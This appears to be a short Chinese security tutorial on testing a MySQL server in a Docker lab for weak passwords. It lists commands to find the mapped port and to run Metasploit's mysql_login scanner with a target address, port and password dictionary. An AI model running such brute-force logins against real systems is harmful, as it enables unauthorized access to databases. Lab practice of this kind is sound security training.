Web安全:MySQL数据库的弱口令漏洞测试.
MySQL是一种关系型数据库管理系统,关系数据库将数据保存在不同的表中,而不是将所有数据放在一个大仓库内,这样就增加了速度并提高了灵活性。MySQL所使用的 SQL 语言是用于访问数据库的最常用标准化语言。MySQL 软件采用了双授权政策,分为社区版和商业版,由于其体积小、速度快、总体拥有成本低,尤其是开放源码这一特点,一般中小型和大型网站的开发都选择 MySQL 作为网站数据库.
目录:
第一步:查看 MySQL 数据库的端口.(默认端口是 3306 )
MySQL数据库的弱口令漏洞测试:
第一步:查看 MySQL 数据库的端口.(默认端口是 3306 )
由于 靶场 的 MySQL 服务端口 3306 映射为主机的 13307 端口.
docker ps // 查看主机 映射端口.
其他 查看端口的方法,可以使用端口扫描工具 nmap 等等...
第二步:利用字典进行破解.(使用 msf 控制台)
msfconsole //进入msf的控制台.
use auxiliary/scanner/mysql/mysql_login //使用 MySQL 暴力破解脚本 mysql_login
show options \\使用show options命令显示暴力破解的参数.
set RHOSTS 192.168.0.101 //配置 MySQL 服务器的 IP 地址.
set RPORT 13307 //配置 MySQL 服务器端口.(默认3306,如果不是这个则修改)
set PASS_FILE /root/root.txt //配置 字典 进行破解的路径.
run //进行测试.
扫描二维码关注公众号,回复:
15453731 查看本文章